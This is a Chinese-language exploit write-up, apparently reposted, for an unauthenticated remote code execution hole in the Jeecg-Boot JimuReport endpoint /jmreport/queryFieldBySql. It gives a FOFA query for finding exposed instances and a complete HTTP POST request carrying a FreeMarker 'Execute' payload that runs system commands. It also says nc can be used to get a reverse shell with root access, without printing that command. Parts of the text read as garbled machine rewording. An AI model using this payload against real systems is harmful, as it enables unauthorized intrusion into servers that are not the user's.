jeect-boot积木报表由于未授权的 API /jmreport/queryFieldBySql 利用了 freemarker 剖析 SQL 语句从而导致了 RCE 漏洞的产生。
1.漏洞级别
高危
2.漏洞搜刮
fofa
- app="Jeecg-Boot 企业级快速开发平台"
4.漏洞复现
这个漏洞的注入点就在于/jeecg-boot/jmreport/queryFieldBySql 且无需用户授权即可执行
构造数据包
- POST /jeecg-boot/jmreport/queryFieldBySql HTTP/2
- Host:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
- Accept-Encoding: gzip, deflate, br
- Accept: */*
- Content-Type: application/json
- Content-Length: 102
- {"sql":"select '<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("whoami ") }' "}
假如命令失败则会显示:
漏洞相对简朴,到这里就复现成功了。
4.2 进一步利用
假如想要进一步rce的话,可以通过nc的方法来反弹shell,执行
长途服务器执行,即可正常获取shell
成功getsshell,root权限
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |
